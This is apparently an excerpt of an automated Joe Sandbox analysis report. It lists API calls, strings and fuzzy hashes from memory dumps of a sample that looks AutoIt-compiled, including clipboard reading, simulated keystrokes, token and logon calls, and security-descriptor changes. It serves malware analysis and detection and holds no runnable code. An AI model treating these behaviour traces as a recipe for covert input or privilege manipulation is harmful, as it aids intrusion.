Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: a01a5d953e71826e57d68e42454621c1c2d178fcca4549e432cf1477dd95f5eb
Instruction ID: 4016fd87fb2d6ddd99db3034808a32d51b320f48ea468b398ad9d4ecca715427
Opcode Fuzzy Hash: a01a5d953e71826e57d68e42454621c1c2d178fcca4549e432cf1477dd95f5eb
Instruction Fuzzy Hash: 63D06C3204010DBBDF028F84ED4AEDA3BAAFB48714F114000BE1856020C732E821AB90

Function 00E598B8 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 00E598C3

Memory Dump Source

Source File: 00000000.00000002.2383571784.0000000000E59000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E59000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e59000_eLo1khn7DQ.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction ID: 83b03032f69a0c4740f6abe86822e791a011aa347a7525e67b711bf0ee6b346d
Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction Fuzzy Hash: 07D05E3090530CEBCB10CAA499049DA73A8DB06326F108B55ED1593281D53599049750

Function 001F1CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 001F1CBC

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: InfoParametersSystem
String ID:
API String ID: 3098949447-0
Opcode ID: 097b116ab79d387e6db9fe5aa51a0727a3de846681b79fd50719117c75cc77e3
Instruction ID: 03c4eda382caf33740c407369f501718ccecb4a956f7b8293a58bfcd714d3d0a
Opcode Fuzzy Hash: 097b116ab79d387e6db9fe5aa51a0727a3de846681b79fd50719117c75cc77e3
Instruction Fuzzy Hash: 1CC09B35280304DFF6145780BC4FF117754E348B04F544001F609759E3C7F11420D750

Function 00E5B294 Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 00E5B2A9

Memory Dump Source

Source File: 00000000.00000002.2383571784.0000000000E59000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E59000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e59000_eLo1khn7DQ.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: 189a48402017a1d9cbf1f9c10bd6c1fd6d467e3cd3ad1d4b8f139d87e3f4a306
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: 95E0BF7494010DFFDB00DFA4D5496DE7BB4EF04312F1005A1FD05E7690DB309E548A62

Function 00E5B298 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 00E5B2A9

Memory Dump Source

Source File: 00000000.00000002.2383571784.0000000000E59000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E59000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e59000_eLo1khn7DQ.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: bafc5e167622b5279fbf1342ba5e513a1af276214462fbb242a5e94f15bde249
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: EAE0E67494010DEFDB00DFB4D54969E7BB4EF04302F100561FD01E2280D7309D508A72

Non-executed Functions

Function 00289576 Relevance: 74.1, APIs: 39, Strings: 3, Instructions: 625windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00209BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00209BB2

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0028961A
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0028965B
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0028969F
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002896C9
SendMessageW.USER32 ref: 002896F2
GetKeyState.USER32(00000011), ref: 0028978B
GetKeyState.USER32(00000009), ref: 00289798
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 002897AE
GetKeyState.USER32(00000010), ref: 002897B8
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002897E9
SendMessageW.USER32 ref: 00289810
SendMessageW.USER32(?,00001030,?,00287E95), ref: 00289918
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0028992E
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00289941
SetCapture.USER32(?), ref: 0028994A
ClientToScreen.USER32(?,?), ref: 002899AF
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 002899BC
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 002899D6
ReleaseCapture.USER32 ref: 002899E1
GetCursorPos.USER32(?), ref: 00289A19
ScreenToClient.USER32(?,?), ref: 00289A26
SendMessageW.USER32(?,00001012,00000000,?), ref: 00289A80
SendMessageW.USER32 ref: 00289AAE
SendMessageW.USER32(?,00001111,00000000,?), ref: 00289AEB
SendMessageW.USER32 ref: 00289B1A
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00289B3B
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00289B4A
GetCursorPos.USER32(?), ref: 00289B68
ScreenToClient.USER32(?,?), ref: 00289B75
GetParent.USER32(?), ref: 00289B93
SendMessageW.USER32(?,00001012,00000000,?), ref: 00289BFA
SendMessageW.USER32 ref: 00289C2B
ClientToScreen.USER32(?,?), ref: 00289C84
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00289CB4
SendMessageW.USER32(?,00001111,00000000,?), ref: 00289CDE
SendMessageW.USER32 ref: 00289D01
ClientToScreen.USER32(?,?), ref: 00289D4E
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00289D82

Part of subcall function 00209944: GetWindowLongW.USER32(?,000000EB), ref: 00209952

GetWindowLongW.USER32(?,000000F0), ref: 00289E05

Strings

@GUI_DRAGID, xrefs: 0028997D
F, xrefs: 00289D07
p#,, xrefs: 00289990

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
String ID: @GUI_DRAGID$F$p#,
API String ID: 3429851547-3654412654
Opcode ID: d9a5a0560492f06687af5f5439df3a904e5ad57126f183d664284f1b154c7d05
Instruction ID: 24383df9695869f4d0f0c9459cd67adfd6a4675be6bb831bd4b742bd272e8927
Opcode Fuzzy Hash: d9a5a0560492f06687af5f5439df3a904e5ad57126f183d664284f1b154c7d05
Instruction Fuzzy Hash: 1D429E78616211AFD724EF24DC48EBABBE9FF49310F180619F555872E1E731A8A0CF51

Function 00284873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 002848F3
SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00284908
SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00284927
SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0028494B
SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0028495C
SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0028497B
SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 002849AE
SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 002849D4
SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00284A0F
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00284A56
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00284A7E
IsMenu.USER32(?), ref: 00284A97
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00284AF2
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00284B20
GetWindowLongW.USER32(?,000000F0), ref: 00284B94
SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00284BE3
SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00284C82
wsprintfW.USER32 ref: 00284CAE
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00284CC9
GetWindowTextW.USER32(?,00000000,00000001), ref: 00284CF1
SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00284D13
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00284D33
GetWindowTextW.USER32(?,00000000,00000001), ref: 00284D5A

Strings

%d/%02d/%02d, xrefs: 00284CA8

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
String ID: %d/%02d/%02d
API String ID: 4054740463-328681919
Opcode ID: 1b3a52f5cc8db89a60be53902c78003cb5592ee1b4b1af63bc70472475719dee
Instruction ID: d41baded1ba004b13736a7f67a2aa5ecb16dbb5b999379187a3769389da13556
Opcode Fuzzy Hash: 1b3a52f5cc8db89a60be53902c78003cb5592ee1b4b1af63bc70472475719dee
Instruction Fuzzy Hash: C7124439522256ABEB28BF24DC49FAE7BF8EF85300F104129F915EB2E1D7749950CB50

Function 0020F98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0020F998
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0024F474
IsIconic.USER32(00000000), ref: 0024F47D
ShowWindow.USER32(00000000,00000009), ref: 0024F48A
SetForegroundWindow.USER32(00000000), ref: 0024F494
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0024F4AA
GetCurrentThreadId.KERNEL32 ref: 0024F4B1
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0024F4BD
AttachThreadInput.USER32(?,00000000,00000001), ref: 0024F4CE
AttachThreadInput.USER32(?,00000000,00000001), ref: 0024F4D6
AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0024F4DE
SetForegroundWindow.USER32(00000000), ref: 0024F4E1
MapVirtualKeyW.USER32(00000012,00000000), ref: 0024F4F6
keybd_event.USER32(00000012,00000000), ref: 0024F501
MapVirtualKeyW.USER32(00000012,00000000), ref: 0024F50B
keybd_event.USER32(00000012,00000000), ref: 0024F510
MapVirtualKeyW.USER32(00000012,00000000), ref: 0024F519
keybd_event.USER32(00000012,00000000), ref: 0024F51E
MapVirtualKeyW.USER32(00000012,00000000), ref: 0024F528
keybd_event.USER32(00000012,00000000), ref: 0024F52D
SetForegroundWindow.USER32(00000000), ref: 0024F530
AttachThreadInput.USER32(?,000000FF,00000000), ref: 0024F557

Strings

Shell_TrayWnd, xrefs: 0024F46F

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: a8a4b59044fea93112a01c2fca2c3d5c10aab49a88a1fbc1cdecf4b653e164ad
Instruction ID: 8dbbeea7bbd16d6f33a18275f9f689eed6f23e9cdd71492cb0a7e8f7484d0efd
Opcode Fuzzy Hash: a8a4b59044fea93112a01c2fca2c3d5c10aab49a88a1fbc1cdecf4b653e164ad
Instruction Fuzzy Hash: 88316075A50218BAEB246FB56C4AFBF7E6CEB84B50F200025FA00F61D1D7B05910AB70

Function 00251201 Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 002516C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0025170D
Part of subcall function 002516C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0025173A
Part of subcall function 002516C3: GetLastError.KERNEL32 ref: 0025174A

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00251286
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 002512A8
CloseHandle.KERNEL32(?), ref: 002512B9
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 002512D1
GetProcessWindowStation.USER32 ref: 002512EA
SetProcessWindowStation.USER32(00000000), ref: 002512F4
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00251310

Part of subcall function 002510BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,002511FC), ref: 002510D4
Part of subcall function 002510BF: CloseHandle.KERNEL32(?,?,002511FC), ref: 002510E9

Strings

winsta0, xrefs: 002512CC
Z+, xrefs: 00251392
default, xrefs: 0025130B
, xrefs: 0025125A

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0$Z+
API String ID: 22674027-1601629916
Opcode ID: f3f4a0a734a93c4da67a63b32e6860efaa5eda48fcd560983f97f66ce296697f
Instruction ID: 44239c1080114b585298776173d4c3398f656de29a9bacafc9f70c3528bda107
Opcode Fuzzy Hash: f3f4a0a734a93c4da67a63b32e6860efaa5eda48fcd560983f97f66ce296697f
Instruction Fuzzy Hash: 8D819B7192020AAFDF219FA4EC49FEE7BB9EF04705F144129FD10A61A1D7748968CB64

Function 00250B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 002510F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00251114
Part of subcall function 002510F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00250B9B,?,?,?), ref: 00251120
Part of subcall function 002510F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00250B9B,?,?,?), ref: 0025112F
Part of subcall function 002510F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00250B9B,?,?,?), ref: 00251136
Part of subcall function 002510F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0025114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00250BCC
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00250C00
GetLengthSid.ADVAPI32(?), ref: 00250C17
GetAce.ADVAPI32(?,00000000,?), ref: 00250C51
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00250C6D
GetLengthSid.ADVAPI32(?), ref: 00250C84
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00250C8C
HeapAlloc.KERNEL32(00000000), ref: 00250C93
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00250CB4
CopySid.ADVAPI32(00000000), ref: 00250CBB
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00250CEA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00250D0C
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00250D1E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00250D45
HeapFree.KERNEL32(00000000), ref: 00250D4C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00250D55
HeapFree.KERNEL32(00000000), ref: 00250D5C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00250D65
HeapFree.KERNEL32(00000000), ref: 00250D6C
GetProcessHeap.KERNEL32(00000000,?), ref: 00250D78
HeapFree.KERNEL32(00000000), ref: 00250D7F

Part of subcall function 00251193: GetProcessHeap.KERNEL32(00000008,00250BB1,?,00000000,?,00250BB1,?), ref: 002511A1
Part of subcall function 00251193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00250BB1,?), ref: 002511A8
Part of subcall function 00251193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00250BB1,?), ref: 002511B7

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 9dfa41a3709c6e7e6e57e0ac9478ad8cc9c1ff6248fb83b8152aaecab22f3825
Instruction ID: b0546d510440c7ee47f67053481754d52501708f936cdc3f670e7e99d02fcaa6
Opcode Fuzzy Hash: 9dfa41a3709c6e7e6e57e0ac9478ad8cc9c1ff6248fb83b8152aaecab22f3825
Instruction Fuzzy Hash: 0E71897691120AABDF109FE4EC88FEEBBB8FF04312F144125ED14A6191D771AA19CB74

Function 0026EAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(0028CC08), ref: 0026EB29
IsClipboardFormatAvailable.USER32(0000000D), ref: 0026EB37
GetClipboardData.USER32(0000000D), ref: 0026EB43
CloseClipboard.USER32 ref: 0026EB4F
GlobalLock.KERNEL32(00000000), ref: 0026EB87
CloseClipboard.USER32 ref: 0026EB91
GlobalUnlock.KERNEL32(00000000), ref: 0026EBBC
IsClipboardFormatAvailable.USER32(00000001), ref: 0026EBC9
GetClipboardData.USER32(00000001), ref: 0026EBD1
GlobalLock.KERNEL32(00000000), ref: 0026EBE2
GlobalUnlock.KERNEL32(00000000), ref: 0026EC22
IsClipboardFormatAvailable.USER32(0000000F), ref: 0026EC38
GetClipboardData.USER32(0000000F), ref: 0026EC44
GlobalLock.KERNEL32(00000000), ref: 0026EC55
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0026EC77
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0026EC94
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0026ECD2
GlobalUnlock.KERNEL32(00000000), ref: 0026ECF3
CountClipboardFormats.USER32 ref: 0026ED14
CloseClipboard.USER32 ref: 0026ED59

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: 6a6d9ed3cdd77a23f7aaec4560ea573f9a176d7f6c0617adfb5ad4cd4fbcfd43
Instruction ID: 6e32691c6a63c50472ea759dfbdd3ff3c33376ff85d55213f84f4b9e22132b4c
Opcode Fuzzy Hash: 6a6d9ed3cdd77a23f7aaec4560ea573f9a176d7f6c0617adfb5ad4cd4fbcfd43
Instruction Fuzzy Hash: F06102782142069FD700EF20E888F3A77E8BF94758F25441DF956872A2DB71ED85CB62

Function 0026698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 002669BE
FindClose.KERNEL32(00000000), ref: 00266A12
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00266A4E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00266A75

Part of subcall function 001F9CB3: _wcslen.LIBCMT ref: 001F9CBD

FileTimeToSystemTime.KERNEL32(?,?), ref: 00266AB2
FileTimeToSystemTime.KERNEL32(?,?), ref: 00266ADF

Strings

%4d, xrefs: 00266BB1
%4d%02d%02d%02d%02d%02d, xrefs: 00266B6A
%02d, xrefs: 00266C00, 00266C0A, 00266C5A, 00266CAA, 00266CFA, 00266D4A
%03d, xrefs: 00266DA2
%4d%02d%02d%02d%02d%02d%03d, xrefs: 00266B32

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: 1db49d4dfb1b6a861d1e596306b5e07d52a4f48c3f781c79bee9d69e3a2481b5
Instruction ID: 0daf75ce3ac63c9f1fa116658edd42496ba4391fba37aed1eb39c8f1310bac5b
Opcode Fuzzy Hash: 1db49d4dfb1b6a861d1e596306b5e07d52a4f48c3f781c79bee9d69e3a2481b5
Instruction Fuzzy Hash: DED17E72518304AEC310EFA4C995EBBB7ECAF98704F04491DF685D6191EB74DA44CBA2

Function 00269642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76E18FB0,?,00000000), ref: 00269663
GetFileAttributesW.KERNEL32(?), ref: 002696A1
SetFileAttributesW.KERNEL32(?,?), ref: 002696BB
FindNextFileW.KERNEL32(00000000,?), ref: 002696D3
FindClose.KERNEL32(00000000), ref: 002696DE
FindFirstFileW.KERNEL32(*.*,?), ref: 002696FA
SetCurrentDirectoryW.KERNEL32(?), ref: 0026974A
SetCurrentDirectoryW.KERNEL32(002B6B7C), ref: 00269768
FindNextFileW.KERNEL32(00000000,00000010), ref: 00269772
FindClose.KERNEL32(00000000), ref: 0026977F
FindClose.KERNEL32(00000000), ref: 0026978F

Strings

*.*, xrefs: 002696F5

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: 3665992da51603f84af94b77093c11bbbe43388979e6152be29b89b6e7ac0076
Instruction ID: 6afa0cfcec15e6f13d1f900eaf232125cc2130ba982b97f2a761bce9282b6ad2
Opcode Fuzzy Hash: 3665992da51603f84af94b77093c11bbbe43388979e6152be29b89b6e7ac0076
Instruction Fuzzy Hash: A131C57652121AAEDF14AFB4EC0CAEE77AC9F49320F204195F805E2090DB34D9D4CF20

Function 0026979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76E18FB0,?,00000000), ref: 002697BE
FindNextFileW.KERNEL32(00000000,?), ref: 00269819
FindClose.KERNEL32(00000000), ref: 00269824
FindFirstFileW.KERNEL32(*.*,?), ref: 00269840
SetCurrentDirectoryW.KERNEL32(?), ref: 00269890
SetCurrentDirectoryW.KERNEL32(002B6B7C), ref: 002698AE
FindNextFileW.KERNEL32(00000000,00000010), ref: 002698B8
FindClose.KERNEL32(00000000), ref: 002698C5
FindClose.KERNEL32(00000000), ref: 002698D5

Part of subcall function 0025DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0025DB00

Strings

*.*, xrefs: 0026983B

